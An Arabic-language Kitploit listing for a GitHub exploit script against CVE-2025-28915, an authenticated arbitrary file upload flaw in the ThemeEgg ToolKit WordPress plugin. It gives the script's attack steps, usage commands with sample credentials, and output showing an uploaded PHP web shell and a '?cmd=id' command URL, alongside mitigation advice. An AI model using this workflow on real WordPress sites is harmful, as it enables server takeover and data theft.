Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-28915 — إضافة ThemeEgg ToolKit لووردبريس <= 1.2.9 - ثغرة رفع ملفات تعسفية | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-28915
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2025-28915

CVE-2025-28915

إضافة ThemeEgg ToolKit لووردبريس <= 1.2.9 - ثغرة رفع ملفات تعسفية

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-28915 - استغلال رفع الملفات التعسفي في إضافة ThemeEgg ToolKit لووردبريس

📌 الوصف

ثغرة رفع ملفات غير مقيد في إضافة ThemeEgg ToolKit لووردبريس (الإصدارات ≤ 1.2.9) تسمح للمهاجمين المصادق عليهم برفع قذائف ويب إلى الخادم. يمكن أن يؤدي ذلك إلى تنفيذ تعليمات برمجية عن بُعد (RCE)، والاستيلاء الكامل على الموقع، وتسريب البيانات الحساسة.

  • CVE ID: CVE-2025-28915
  • شدة الثغرة: 🔴 حرجة (CVSS: 9.1)
  • الإصدارات المتأثرة: ThemeEgg ToolKit ≤ 1.2.9
  • ناقل الهجوم: مصادق عليه، يتطلب مستخدم ووردبريس بصلاحيات كافية
  • التأثير: اختراق كامل للخادم، تنفيذ برمجيات، تسريب بيانات

🔥 نظرة عامة على الاستغلال

يقوم هذا السكريبت بأتمتة استغلال CVE-2025-28915 من خلال:

  1. التحقق من إصدار الإضافة لتأكيد وجود الثغرة.
  2. تسجيل الدخول إلى ووردبريس باستخدام بيانات الاعتماد المقدمة.
  3. استخراج nonce الأمان المطلوب للمصادقة.
  4. رفع قذيفة ويب PHP عبر النقطة الضعيفة.
  5. توفير رابط القذيفة لمرحلة ما بعد الاستغلال.

🚀 الاستخدام

المتطلبات الأساسية:

  • Python 3.x
  • requests, beautifulsoup4

التثبيت:

root@kitploit:~
pip install requests beautifulsoup4

مثال الأمر:

root@kitploit:~
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123

الوسائط:

الوسيطةالوصف
-uعنوان URL المستهدف لووردبريس (مثل http://target.com/wordpress)
-unاسم مستخدم ووردبريس
-pكلمة مرور ووردبريس

🎯 مثال على مخرجات الاستغلال

root@kitploit:~
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id

⚠️ التخفيف

  • تحديث إضافة ThemeEgg ToolKit إلى إصدار مصحح (>1.2.9).
  • تقييد رفع الملفات بحيث يُسمح فقط بأنواع الملفات الضرورية.
  • تنصيب إضافات أمان تمنع رفع الملفات غير المصرح به.
  • مراقبة السجلات بحثًا عن أي نشاط مشبوه.

📜 إخلاء مسؤولية قانوني

هذا السكريبت مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط. الاستخدام غير المصرح به غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.

بواسطة: Khaled Alenazi (Nxploit)

تنزيل الأداة